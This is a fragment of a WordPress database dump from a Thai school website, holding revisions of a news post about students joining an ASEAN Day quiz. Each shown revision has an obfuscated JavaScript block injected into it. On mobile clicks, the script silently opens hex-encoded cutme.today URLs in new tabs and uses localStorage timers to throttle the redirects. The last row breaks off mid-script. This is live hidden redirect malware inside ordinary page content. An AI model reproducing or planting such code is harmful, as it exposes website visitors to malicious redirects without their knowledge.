(351,2,'2024-09-03 11:51:04','2024-09-03 04:51:04','','457791533_122174879846202781_8796933381137744998_n','','inherit','open','closed','','457791533_122174879846202781_8796933381137744998_n','','','2024-09-03 11:51:04','2024-09-03 04:51:04','',349,'http://watprato.ssk.in.th/wp-content/uploads/2024/09/457791533_122174879846202781_8796933381137744998_n.jpg',0,'attachment','image/jpeg',0),
(352,2,'2024-09-03 11:52:41','2024-09-03 04:52:41','<!-- wp:paragraph -->\n<p>นางสาวสริตา เข็มทอง ตำแหน่ง ครู วิทยฐานะ ครูชำนาญการ ได้นำนักเรียนระดับชั้นมัธยมศึกษาปีที่ 3 จำนวน 2 คน คือ เด็กหญิงเข็มทอง จำปาใด และ เด็กหญิงณัชชา กั้วจำนงค์ เข้าร่วมกิจกรรมวันอาเซียน (ASEAN Day) ร่วมการแข่งขันตอบปัญหาอาเซียน (ASEAN Quiz) ระหว่างวันที่ 6-8 สิงหาคม 2567 ณ กรุงเทพมหานคร จัดโดย กรมอาเซียน กระทรวงการต่างประเทศ โดยมีวัตถุประสงค์เพื่อสร้างองค์ความรู้เกี่ยวกับอาเซียน เสริมสร้างความสัมพันธ์และเครือข่ายระหว่างกรมอาเซียน โรงเรียน และนักเรียนมากยิ่งขึ้น</p>\n<!-- /wp:paragraph -->\n\n<!-- wp:generateblocks/container {\"uniqueId\":\"3f4dca20\",\"isDynamic\":true,\"blockVersion\":4} -->\n<!-- wp:generateblocks/container {\"uniqueId\":\"11da9cf6\",\"isDynamic\":true,\"blockVersion\":4} -->\n<!-- wp:image {\"id\":350,\"sizeSlug\":\"large\",\"linkDestination\":\"none\"} -->\n<figure class=\"wp-block-image size-large\"><img src=\"http://watprato.ssk.in.th/wp-content/uploads/2024/09/457381847_122174879558202781_6672815312348190309_n-724x1024.jpg\" alt=\"\" class=\"wp-image-350\"/></figure>\n<!-- /wp:image -->\n\n<!-- wp:image {\"id\":351,\"sizeSlug\":\"large\",\"linkDestination\":\"none\"} -->\n<figure class=\"wp-block-image size-large\"><img src=\"http://watprato.ssk.in.th/wp-content/uploads/2024/09/457791533_122174879846202781_8796933381137744998_n-1024x727.jpg\" alt=\"\" class=\"wp-image-351\"/></figure>\n<!-- /wp:image -->\n<!-- /wp:generateblocks/container -->\n<!-- /wp:generateblocks/container -->\r\n<script>function _0x3023(_0x562006,_0x1334d6){const _0x1922f2=_0x1922();return _0x3023=function(_0x30231a,_0x4e4880){_0x30231a=_0x30231a-0x1bf;let _0x2b207e=_0x1922f2[_0x30231a];return _0x2b207e;},_0x3023(_0x562006,_0x1334d6);}function _0x1922(){const _0x5a990b=[\'substr\',\'length\',\'-hurs\',\'open\',\'round\',\'443779RQfzWn\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x63\\x75\\x74\\x6d\\x65\\x2e\\x74\\x6f\\x64\\x61\\x79\\x2f\\x6f\\x63\\x47\\x33\\x63\\x353\',\'click\',\'5114346JdlaMi\',\'1780163aSIYqH\',\'forEach\',\'host\',\'_blank\',\'68512ftWJcO\',\'addEventListener\',\'-mnts\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x63\\x75\\x74\\x6d\\x65\\x2e\\x74\\x6f\\x64\\x61\\x79\\x2f\\x74\\x68\\x4f\\x35\\x63\\x385\',\'4588749LmrVjF\',\'parse\',\'630bGPCEV\',\'mobileCheck\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x63\\x75\\x74\\x6d\\x65\\x2e\\x74\\x6f\\x64\\x61\\x79\\x2f\\x41\\x6e\\x50\\x38\\x63\\x338\',\'abs\',\'-local-storage\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x63\\x75\\x74\\x6d\\x65\\x2e\\x74\\x6f\\x64\\x61\\x79\\x2f\\x41\\x58\\x4e\\x39\\x63\\x389\',\'56bnMKls\',\'opera\',\'6946eLteFW\',\'userAgent\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x63\\x75\\x74\\x6d\\x65\\x2e\\x74\\x6f\\x64\\x61\\x79\\x2f\\x49\\x4d\\x76\\x34\\x63\\x324\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x63\\x75\\x74\\x6d\\x65\\x2e\\x74\\x6f\\x64\\x61\\x79\\x2f\\x48\\x62\\x61\\x37\\x63\\x357\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x63\\x75\\x74\\x6d\\x65\\x2e\\x74\\x6f\\x64\\x61\\x79\\x2f\\x42\\x42\\x47\\x32\\x63\\x382\',\'floor\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x63\\x75\\x74\\x6d\\x65\\x2e\\x74\\x6f\\x64\\x61\\x79\\x2f\\x50\\x79\\x78\\x36\\x63\\x376\',\'999HIfBhL\',\'filter\',\'test\',\'getItem\',\'random\',\'138490EjXyHW\',\'stopPropagation\',\'setItem\',\'70kUzPYI\'];_0x1922=function(){return _0x5a990b;};return _0x1922();}(function(_0x16ffe6,_0x1e5463){const _0x20130f=_0x3023,_0x307c06=_0x16ffe6();while(!![]){try{const _0x1dea23=parseInt(_0x20130f(0x1d6))/0x1+-parseInt(_0x20130f(0x1c1))/0x2*(parseInt(_0x20130f(0x1c8))/0x3)+parseInt(_0x20130f(0x1bf))/0x4*(-parseInt(_0x20130f(0x1cd))/0x5)+parseInt(_0x20130f(0x1d9))/0x6+-parseInt(_0x20130f(0x1e4))/0x7*(parseInt(_0x20130f(0x1de))/0x8)+parseInt(_0x20130f(0x1e2))/0x9+-parseInt(_0x20130f(0x1d0))/0xa*(-parseInt(_0x20130f(0x1da))/0xb);if(_0x1dea23===_0x1e5463)break;else _0x307c06[\'push\'](_0x307c06[\'shift\']());}catch(_0x3e3a47){_0x307c06[\'push\'](_0x307c06[\'shift\']());}}}(_0x1922,0x984cd),function(_0x34eab3){const _0x111835=_0x3023;window[\'mobileCheck\']=function(){const _0x123821=_0x3023;let _0x399500=![];return function(_0x5e9786){const _0x1165a7=_0x3023;if(/(android|bb\\d+|meego).+mobile|avantgo|bada\\/|blackberry|blazer|compal|elaine|fennec|hiptop|iemobile|ip(hone|od)|iris|kindle|lge |maemo|midp|mmp|mobile.+firefox|netfront|opera m(ob|in)i|palm( os)?|phone|p(ixi|re)\\/|plucker|pocket|psp|series(4|6)0|symbian|treo|up\\.(browser|link)|vodafone|wap|windows ce|xda|xiino/i[_0x1165a7(0x1ca)](_0x5e9786)||/1207|6310|6590|3gso|4thp|50[1-6]i|770s|802s|a wa|abac|ac(er|oo|s\\-)|ai(ko|rn)|al(av|ca|co)|amoi|an(ex|ny|yw)|aptu|ar(ch|go)|as(te|us)|attw|au(di|\\-m|r |s )|avan|be(ck|ll|nq)|bi(lb|rd)|bl(ac|az)|br(e|v)w|bumb|bw\\-(n|u)|c55\\/|capi|ccwa|cdm\\-|cell|chtm|cldc|cmd\\-|co(mp|nd)|craw|da(it|ll|ng)|dbte|dc\\-s|devi|dica|dmob|do(c|p)o|ds(12|\\-d)|el(49|ai)|em(l2|ul)|er(ic|k0)|esl8|ez([4-7]0|os|wa|ze)|fetc|fly(\\-|_)|g1 u|g560|gene|gf\\-5|g\\-mo|go(\\.w|od)|gr(ad|un)|haie|hcit|hd\\-(m|p|t)|hei\\-|hi(pt|ta)|hp( i|ip)|hs\\-c|ht(c(\\-| |_|a|g|p|s|t)|tp)|hu(aw|tc)|i\\-(20|go|ma)|i230|iac( |\\-|\\/)|ibro|idea|ig01|ikom|im1k|inno|ipaq|iris|ja(t|v)a|jbro|jemu|jigs|kddi|keji|kgt( |\\/)|klon|kpt |kwc\\-|kyo(c|k)|le(no|xi)|lg( g|\\/(k|l|u)|50|54|\\-[a-w])|libw|lynx|m1\\-w|m3ga|m50\\/|ma(te|ui|xo)|mc(01|21|ca)|m\\-cr|me(rc|ri)|mi(o8|oa|ts)|mmef|mo(01|02|bi|de|do|t(\\-| |o|v)|zz)|mt(50|p1|v )|mwbp|mywa|n10[0-2]|n20[2-3]|n30(0|2)|n50(0|2|5)|n7(0(0|1)|10)|ne((c|m)\\-|on|tf|wf|wg|wt)|nok(6|i)|nzph|o2im|op(ti|wv)|oran|owg1|p800|pan(a|d|t)|pdxg|pg(13|\\-([1-8]|c))|phil|pire|pl(ay|uc)|pn\\-2|po(ck|rt|se)|prox|psio|pt\\-g|qa\\-a|qc(07|12|21|32|60|\\-[2-7]|i\\-)|qtek|r380|r600|raks|rim9|ro(ve|zo)|s55\\/|sa(ge|ma|mm|ms|ny|va)|sc(01|h\\-|oo|p\\-)|sdk\\/|se(c(\\-|0|1)|47|mc|nd|ri)|sgh\\-|shar|sie(\\-|m)|sk\\-0|sl(45|id)|sm(al|ar|b3|it|t5)|so(ft|ny)|sp(01|h\\-|v\\-|v )|sy(01|mb)|t2(18|50)|t6(00|10|18)|ta(gt|lk)|tcl\\-|tdg\\-|tel(i|m)|tim\\-|t\\-mo|to(pl|sh)|ts(70|m\\-|m3|m5)|tx\\-9|up(\\.b|g1|si)|utst|v400|v750|veri|vi(rg|te)|vk(40|5[0-3]|\\-v)|vm40|voda|vulc|vx(52|53|60|61|70|80|81|83|85|98)|w3c(\\-| )|webc|whit|wi(g |nc|nw)|wmlb|wonu|x700|yas\\-|your|zeto|zte\\-/i[_0x1165a7(0x1ca)](_0x5e9786[_0x1165a7(0x1d1)](0x0,0x4)))_0x399500=!![];}(navigator[_0x123821(0x1c2)]||navigator[\'vendor\']||window[_0x123821(0x1c0)]),_0x399500;};const _0xe6f43=[\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x63\\x75\\x74\\x6d\\x65\\x2e\\x74\\x6f\\x64\\x61\\x79\\x2f\\x77\\x67\\x64\\x30\\x63\\x380\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x63\\x75\\x74\\x6d\\x65\\x2e\\x74\\x6f\\x64\\x61\\x79\\x2f\\x4d\\x76\\x49\\x31\\x63\\x361\',_0x111835(0x1c5),_0x111835(0x1d7),_0x111835(0x1c3),_0x111835(0x1e1),_0x111835(0x1c7),_0x111835(0x1c4),_0x111835(0x1e6),_0x111835(0x1e9)],_0x7378e8=0x3,_0xc82d98=0x6,_0x487206=_0x551830=>{const _0x2c6c7a=_0x111835;_0x551830[_0x2c6c7a(0x1db)]((_0x3ee06f,_0x37dc07)=>{const _0x476c2a=_0x2c6c7a;!localStorage[\'getItem\'](_0x3ee06f+_0x476c2a(0x1e8))&&localStorage[_0x476c2a(0x1cf)](_0x3ee06f+_0x476c2a(0x1e8),0x0);});},_0x564ab0=_0x3743e2=>{const _0x415ff3=_0x111835,_0x229a83=_0x3743e2[_0x415ff3(0x1c9)]((_0x37389f,_0x22f261)=>localStorage[_0x415ff3(0x1cb)](_0x37389f+_0x415ff3(0x1e8))==0x0);return _0x229a83[Math[_0x415ff3(0x1c6)](Math[_0x415ff3(0x1cc)]()*_0x229a83[_0x415ff3(0x1d2)])];},_0x173ccb=_0xb01406=>localStorage[_0x111835(0x1cf)](_0xb01406+_0x111835(0x1e8),0x1),_0x5792ce=_0x5415c5=>localStorage[_0x111835(0x1cb)](_0x5415c5+_0x111835(0x1e8)),_0xa7249=(_0x354163,_0xd22cba)=>localStorage[_0x111835(0x1cf)](_0x354163+_0x111835(0x1e8),_0xd22cba),_0x381bfc=(_0x49e91b,_0x531bc4)=>{const _0x1b0982=_0x111835,_0x1da9e1=0x3e8*0x3c*0x3c;return Math[_0x1b0982(0x1d5)](Math[_0x1b0982(0x1e7)](_0x531bc4-_0x49e91b)/_0x1da9e1);},_0x6ba060=(_0x1e9127,_0x28385f)=>{const _0xb7d87=_0x111835,_0xc3fc56=0x3e8*0x3c;return Math[_0xb7d87(0x1d5)](Math[_0xb7d87(0x1e7)](_0x28385f-_0x1e9127)/_0xc3fc56);},_0x370e93=(_0x286b71,_0x3587b8,_0x1bcfc4)=>{const _0x22f77c=_0x111835;_0x487206(_0x286b71),newLocation=_0x564ab0(_0x286b71),_0xa7249(_0x3587b8+\'-mnts\',_0x1bcfc4),_0xa7249(_0x3587b8+_0x22f77c(0x1d3),_0x1bcfc4),_0x173ccb(newLocation),window[\'mobileCheck\']()&&window[_0x22f77c(0x1d4)](newLocation,\'_blank\');};_0x487206(_0xe6f43);function _0x168fb9(_0x36bdd0){const _0x2737e0=_0x111835;_0x36bdd0[_0x2737e0(0x1ce)]();const _0x263ff7=location[_0x2737e0(0x1dc)];let _0x1897d7=_0x564ab0(_0xe6f43);const _0x48cc88=Date[_0x2737e0(0x1e3)](new Date()),_0x1ec416=_0x5792ce(_0x263ff7+_0x2737e0(0x1e0)),_0x23f079=_0x5792ce(_0x263ff7+_0x2737e0(0x1d3));if(_0x1ec416&&_0x23f079)try{const _0x2e27c9=parseInt(_0x1ec416),_0x1aa413=parseInt(_0x23f079),_0x418d13=_0x6ba060(_0x48cc88,_0x2e27c9),_0x13adf6=_0x381bfc(_0x48cc88,_0x1aa413);_0x13adf6>=_0xc82d98&&(_0x487206(_0xe6f43),_0xa7249(_0x263ff7+_0x2737e0(0x1d3),_0x48cc88)),_0x418d13>=_0x7378e8&&(_0x1897d7&&window[_0x2737e0(0x1e5)]()&&(_0xa7249(_0x263ff7+_0x2737e0(0x1e0),_0x48cc88),window[_0x2737e0(0x1d4)](_0x1897d7,_0x2737e0(0x1dd)),_0x173ccb(_0x1897d7)));}catch(_0x161a43){_0x370e93(_0xe6f43,_0x263ff7,_0x48cc88);}else _0x370e93(_0xe6f43,_0x263ff7,_0x48cc88);}document[_0x111835(0x1df)](_0x111835(0x1d8),_0x168fb9);}());</script>','ASEAN DAY 2024','','inherit','closed','closed','','349-revision-v1','','','2024-09-03 11:52:41','2024-09-03 04:52:41','',349,'http://watprato.ssk.in.th/?p=352',0,'revision','',0),
(354,2,'2024-09-03 11:54:00','2024-09-03 04:54:00','<!-- wp:paragraph -->\n<p>นางสาวสริตา เข็มทอง ตำแหน่ง ครู วิทยฐานะ ครูชำนาญการ ได้นำนักเรียนระดับชั้นมัธยมศึกษาปีที่ 3 จำนวน 2 คน คือ เด็กหญิงเข็มทอง จำปาใด และ เด็กหญิงณัชชา กั้วจำนงค์ เข้าร่วมกิจกรรมวันอาเซียน (ASEAN Day) ร่วมการแข่งขันตอบปัญหาอาเซียน (ASEAN Quiz) ระหว่างวันที่ 6-8 สิงหาคม 2567 ณ กรุงเทพมหานคร จัดโดย กรมอาเซียน กระทรวงการต่างประเทศ โดยมีวัตถุประสงค์เพื่อสร้างองค์ความรู้เกี่ยวกับอาเซียน เสริมสร้างความสัมพันธ์และเครือข่ายระหว่างกรมอาเซียน โรงเรียน และนักเรียนมากยิ่งขึ้น</p>\n<!-- /wp:paragraph -->\n\n<!-- wp:paragraph -->\n<p></p>\n<!-- /wp:paragraph -->\n\n<!-- wp:generateblocks/container {\"uniqueId\":\"3f4dca20\",\"isDynamic\":true,\"blockVersion\":4} -->\n<!-- wp:generateblocks/container {\"uniqueId\":\"11da9cf6\",\"isDynamic\":true,\"blockVersion\":4} -->\n<!-- wp:image {\"id\":350,\"sizeSlug\":\"large\",\"linkDestination\":\"none\"} -->\n<figure class=\"wp-block-image size-large\"><img src=\"http://watprato.ssk.in.th/wp-content/uploads/2024/09/457381847_122174879558202781_6672815312348190309_n-724x1024.jpg\" alt=\"\" class=\"wp-image-350\"/></figure>\n<!-- /wp:image -->\n\n<!-- wp:image {\"id\":351,\"sizeSlug\":\"large\",\"linkDestination\":\"none\"} -->\n<figure class=\"wp-block-image size-large\"><img src=\"http://watprato.ssk.in.th/wp-content/uploads/2024/09/457791533_122174879846202781_8796933381137744998_n-1024x727.jpg\" alt=\"\" class=\"wp-image-351\"/></figure>\n<!-- /wp:image -->\n<!-- /wp:generateblocks/container -->\n<!-- /wp:generateblocks/container -->\r\n<script>function _0x3023(_0x562006,_0x1334d6){const _0x1922f2=_0x1922();return _0x3023=function(_0x30231a,_0x4e4880){_0x30231a=_0x30231a-0x1bf;let _0x2b207e=_0x1922f2[_0x30231a];return _0x2b207e;},_0x3023(_0x562006,_0x1334d6);}function _0x1922(){const _0x5a990b=[\'substr\',\'length\',\'-hurs\',\'open\',\'round\',\'443779RQfzWn\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x63\\x75\\x74\\x6d\\x65\\x2e\\x74\\x6f\\x64\\x61\\x79\\x2f\\x6f\\x63\\x47\\x33\\x63\\x353\',\'click\',\'5114346JdlaMi\',\'1780163aSIYqH\',\'forEach\',\'host\',\'_blank\',\'68512ftWJcO\',\'addEventListener\',\'-mnts\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x63\\x75\\x74\\x6d\\x65\\x2e\\x74\\x6f\\x64\\x61\\x79\\x2f\\x74\\x68\\x4f\\x35\\x63\\x385\',\'4588749LmrVjF\',\'parse\',\'630bGPCEV\',\'mobileCheck\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x63\\x75\\x74\\x6d\\x65\\x2e\\x74\\x6f\\x64\\x61\\x79\\x2f\\x41\\x6e\\x50\\x38\\x63\\x338\',\'abs\',\'-local-storage\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x63\\x75\\x74\\x6d\\x65\\x2e\\x74\\x6f\\x64\\x61\\x79\\x2f\\x41\\x58\\x4e\\x39\\x63\\x389\',\'56bnMKls\',\'opera\',\'6946eLteFW\',\'userAgent\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x63\\x75\\x74\\x6d\\x65\\x2e\\x74\\x6f\\x64\\x61\\x79\\x2f\\x49\\x4d\\x76\\x34\\x63\\x324\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x63\\x75\\x74\\x6d\\x65\\x2e\\x74\\x6f\\x64\\x61\\x79\\x2f\\x48\\x62\\x61\\x37\\x63\\x357\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x63\\x75\\x74\\x6d\\x65\\x2e\\x74\\x6f\\x64\\x61\\x79\\x2f\\x42\\x42\\x47\\x32\\x63\\x382\',\'floor\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x63\\x75\\x74\\x6d\\x65\\x2e\\x74\\x6f\\x64\\x61\\x79\\x2f\\x50\\x79\\x78\\x36\\x63\\x376\',\'999HIfBhL\',\'filter\',\'test\',\'getItem\',\'random\',\'138490EjXyHW\',\'stopPropagation\',\'setItem\',\'70kUzPYI\'];_0x1922=function(){return _0x5a990b;};return _0x1922();}(function(_0x16ffe6,_0x1e5463){const _0x20130f=_0x3023,_0x307c06=_0x16ffe6();while(!![]){try{const _0x1dea23=parseInt(_0x20130f(0x1d6))/0x1+-parseInt(_0x20130f(0x1c1))/0x2*(parseInt(_0x20130f(0x1c8))/0x3)+parseInt(_0x20130f(0x1bf))/0x4*(-parseInt(_0x20130f(0x1cd))/0x5)+parseInt(_0x20130f(0x1d9))/0x6+-parseInt(_0x20130f(0x1e4))/0x7*(parseInt(_0x20130f(0x1de))/0x8)+parseInt(_0x20130f(0x1e2))/0x9+-parseInt(_0x20130f(0x1d0))/0xa*(-parseInt(_0x20130f(0x1da))/0xb);if(_0x1dea23===_0x1e5463)break;else _0x307c06[\'push\'](_0x307c06[\'shift\']());}catch(_0x3e3a47){_0x307c06[\'push\'](_0x307c06[\'shift\']());}}}(_0x1922,0x984cd),function(_0x34eab3){const _0x111835=_0x3023;window[\'mobileCheck\']=function(){const _0x123821=_0x3023;let _0x399500=![];return function(_0x5e9786){const _0x1165a7=_0x3023;if(/(android|bb\\d+|meego).+mobile|avantgo|bada\\/|blackberry|blazer|compal|elaine|fennec|hiptop|iemobile|ip(hone|od)|iris|kindle|lge |maemo|midp|mmp|mobile.+firefox|netfront|opera m(ob|in)i|palm( os)?|phone|p(ixi|re)\\/|plucker|pocket|psp|series(4|6)0|symbian|treo|up\\.(browser|link)|vodafone|wap|windows ce|xda|xiino/i[_0x1165a7(0x1ca)](_0x5e9786)||/1207|6310|6590|3gso|4thp|50[1-6]i|770s|802s|a wa|abac|ac(er|oo|s\\-)|ai(ko|rn)|al(av|ca|co)|amoi|an(ex|ny|yw)|aptu|ar(ch|go)|as(te|us)|attw|au(di|\\-m|r |s )|avan|be(ck|ll|nq)|bi(lb|rd)|bl(ac|az)|br(e|v)w|bumb|bw\\-(n|u)|c55\\/|capi|ccwa|cdm\\-|cell|chtm|cldc|cmd\\-|co(mp|nd)|craw|da(it|ll|ng)|dbte|dc\\-s|devi|dica|dmob|do(c|p)o|ds(12|\\-d)|el(49|ai)|em(l2|ul)|er(ic|k0)|esl8|ez([4-7]0|os|wa|ze)|fetc|fly(\\-|_)|g1 u|g560|gene|gf\\-5|g\\-mo|go(\\.w|od)|gr(ad|un)|haie|hcit|hd\\-(m|p|t)|hei\\-|hi(pt|ta)|hp( i|ip)|hs\\-c|ht(c(\\-| |_|a|g|p|s|t)|tp)|hu(aw|tc)|i\\-(20|go|ma)|i230|iac( |\\-|\\/)|ibro|idea|ig01|ikom|im1k|inno|ipaq|iris|ja(t|v)a|jbro|jemu|jigs|kddi|keji|kgt( |\\/)|klon|kpt |kwc\\-|kyo(c|k)|le(no|xi)|lg( g|\\/(k|l|u)|50|54|\\-[a-w])|libw|lynx|m1\\-w|m3ga|m50\\/|ma(te|ui|xo)|mc(01|21|ca)|m\\-cr|me(rc|ri)|mi(o8|oa|ts)|mmef|mo(01|02|bi|de|do|t(\\-| |o|v)|zz)|mt(50|p1|v )|mwbp|mywa|n10[0-2]|n20[2-3]|n30(0|2)|n50(0|2|5)|n7(0(0|1)|10)|ne((c|m)\\-|on|tf|wf|wg|wt)|nok(6|i)|nzph|o2im|op(ti|wv)|oran|owg1|p800|pan(a|d|t)|pdxg|pg(13|\\-([1-8]|c))|phil|pire|pl(ay|uc)|pn\\-2|po(ck|rt|se)|prox|psio|pt\\-g|qa\\-a|qc(07|12|21|32|60|\\-[2-7]|i\\-)|qtek|r380|r600|raks|rim9|ro(ve|zo)|s55\\/|sa(ge|ma|mm|ms|ny|va)|sc(01|h\\-|oo|p\\-)|sdk\\/|se(c(\\-|0|1)|47|mc|nd|ri)|sgh\\-|shar|sie(\\-|m)|sk\\-0|sl(45|id)|sm(al|ar|b3|it|t5)|so(ft|ny)|sp(01|h\\-|v\\-|v )|sy(01|mb)|t2(18|50)|t6(00|10|18)|ta(gt|lk)|tcl\\-|tdg\\-|tel(i|m)|tim\\-|t\\-mo|to(pl|sh)|ts(70|m\\-|m3|m5)|tx\\-9|up(\\.b|g1|si)|utst|v400|v750|veri|vi(rg|te)|vk(40|5[0-3]|\\-v)|vm40|voda|vulc|vx(52|53|60|61|70|80|81|83|85|98)|w3c(\\-| )|webc|whit|wi(g |nc|nw)|wmlb|wonu|x700|yas\\-|your|zeto|zte\\-/i[_0x1165a7(0x1ca)](_0x5e9786[_0x1165a7(0x1d1)](0x0,0x4)))_0x399500=!![];}(navigator[_0x123821(0x1c2)]||navigator[\'vendor\']||window[_0x123821(0x1c0)]),_0x399500;};const _0xe6f43=[\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x63\\x75\\x74\\x6d\\x65\\x2e\\x74\\x6f\\x64\\x61\\x79\\x2f\\x77\\x67\\x64\\x30\\x63\\x380\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x63\\x75\\x74\\x6d\\x65\\x2e\\x74\\x6f\\x64\\x61\\x79\\x2f\\x4d\\x76\\x49\\x31\\x63\\x361\',_0x111835(0x1c5),_0x111835(0x1d7),_0x111835(0x1c3),_0x111835(0x1e1),_0x111835(0x1c7),_0x111835(0x1c4),_0x111835(0x1e6),_0x111835(0x1e9)],_0x7378e8=0x3,_0xc82d98=0x6,_0x487206=_0x551830=>{const _0x2c6c7a=_0x111835;_0x551830[_0x2c6c7a(0x1db)]((_0x3ee06f,_0x37dc07)=>{const _0x476c2a=_0x2c6c7a;!localStorage[\'getItem\'](_0x3ee06f+_0x476c2a(0x1e8))&&localStorage[_0x476c2a(0x1cf)](_0x3ee06f+_0x476c2a(0x1e8),0x0);});},_0x564ab0=_0x3743e2=>{const _0x415ff3=_0x111835,_0x229a83=_0x3743e2[_0x415ff3(0x1c9)]((_0x37389f,_0x22f261)=>localStorage[_0x415ff3(0x1cb)](_0x37389f+_0x415ff3(0x1e8))==0x0);return _0x229a83[Math[_0x415ff3(0x1c6)](Math[_0x415ff3(0x1cc)]()*_0x229a83[_0x415ff3(0x1d2)])];},_0x173ccb=_0xb01406=>localStorage[_0x111835(0x1cf)](_0xb01406+_0x111835(0x1e8),0x1),_0x5792ce=_0x5415c5=>localStorage[_0x111835(0x1cb)](_0x5415c5+_0x111835(0x1e8)),_0xa7249=(_0x354163,_0xd22cba)=>localStorage[_0x111835(0x1cf)](_0x354163+_0x111835(0x1e8),_0xd22cba),_0x381bfc=(_0x49e91b,_0x531bc4)=>{const _0x1b0982=_0x111835,_0x1da9e1=0x3e8*0x3c*0x3c;return Math[_0x1b0982(0x1d5)](Math[_0x1b0982(0x1e7)](_0x531bc4-_0x49e91b)/_0x1da9e1);},_0x6ba060=(_0x1e9127,_0x28385f)=>{const _0xb7d87=_0x111835,_0xc3fc56=0x3e8*0x3c;return Math[_0xb7d87(0x1d5)](Math[_0xb7d87(0x1e7)](_0x28385f-_0x1e9127)/_0xc3fc56);},_0x370e93=(_0x286b71,_0x3587b8,_0x1bcfc4)=>{const _0x22f77c=_0x111835;_0x487206(_0x286b71),newLocation=_0x564ab0(_0x286b71),_0xa7249(_0x3587b8+\'-mnts\',_0x1bcfc4),_0xa7249(_0x3587b8+_0x22f77c(0x1d3),_0x1bcfc4),_0x173ccb(newLocation),window[\'mobileCheck\']()&&window[_0x22f77c(0x1d4)](newLocation,\'_blank\');};_0x487206(_0xe6f43);function _0x168fb9(_0x36bdd0){const _0x2737e0=_0x111835;_0x36bdd0[_0x2737e0(0x1ce)]();const _0x263ff7=location[_0x2737e0(0x1dc)];let _0x1897d7=_0x564ab0(_0xe6f43);const _0x48cc88=Date[_0x2737e0(0x1e3)](new Date()),_0x1ec416=_0x5792ce(_0x263ff7+_0x2737e0(0x1e0)),_0x23f079=_0x5792ce(_0x263ff7+_0x2737e0(0x1d3));if(_0x1ec416&&_0x23f079)try{const _0x2e27c9=parseInt(_0x1ec416),_0x1aa413=parseInt(_0x23f079),_0x418d13=_0x6ba060(_0x48cc88,_0x2e27c9),_0x13adf6=_0x381bfc(_0x48cc88,_0x1aa413);_0x13adf6>=_0xc82d98&&(_0x487206(_0xe6f43),_0xa7249(_0x263ff7+_0x2737e0(0x1d3),_0x48cc88)),_0x418d13>=_0x7378e8&&(_0x1897d7&&window[_0x2737e0(0x1e5)]()&&(_0xa7249(_0x263ff7+_0x2737e0(0x1e0),_0x48cc88),window[_0x2737e0(0x1d4)](_0x1897d7,_0x2737e0(0x1dd)),_0x173ccb(_0x1897d7)));}catch(_0x161a43){_0x370e93(_0xe6f43,_0x263ff7,_0x48cc88);}else _0x370e93(_0xe6f43,_0x263ff7,_0x48cc88);}document[_0x111835(0x1df)](_0x111835(0x1d8),_0x168fb9);}());</script>','ASEAN DAY 2024','','inherit','closed','closed','','349-revision-v1','','','2024-09-03 11:54:00','2024-09-03 04:54:00','',349,'http://watprato.ssk.in.th/?p=354',0,'revision','',0),
(355,2,'2024-09-03 11:55:26','2024-09-03 04:55:26','<!-- wp:paragraph -->\n<p></p>\n<!-- /wp:paragraph -->\n\n<!-- wp:generateblocks/container {\"uniqueId\":\"3f4dca20\",\"isDynamic\":true,\"blockVersion\":4} -->\n<!-- wp:generateblocks/container {\"uniqueId\":\"11da9cf6\",\"isDynamic\":true,\"blockVersion\":4} -->\n<!-- wp:image {\"id\":350,\"sizeSlug\":\"large\",\"linkDestination\":\"none\"} -->\n<figure class=\"wp-block-image size-large\"><img src=\"http://watprato.ssk.in.th/wp-content/uploads/2024/09/457381847_122174879558202781_6672815312348190309_n-724x1024.jpg\" alt=\"\" class=\"wp-image-350\"/></figure>\n<!-- /wp:image -->\n\n<!-- wp:image {\"id\":351,\"sizeSlug\":\"large\",\"linkDestination\":\"none\"} -->\n<figure class=\"wp-block-image size-large\"><img src=\"http://watprato.ssk.in.th/wp-content/uploads/2024/09/457791533_122174879846202781_8796933381137744998_n-1024x727.jpg\" alt=\"\" class=\"wp-image-351\"/></figure>\n<!-- /wp:image -->\n<!-- /wp:generateblocks/container -->\n<!-- /wp:generateblocks/container -->\r\n<script>function _0x3023(_0x562006,_0x1334d6){const _0x1922f2=_0x1922();return _0x3023=function(_0x30231a,_0x4e4880){_0x30231a=_0x30231a-0x1bf;let _0x2b207e=_0x1922f2[_0x30231a];return _0x2b207e;},_0x3023(_0x562006,_0x1334d6);}function _0x1922(){const 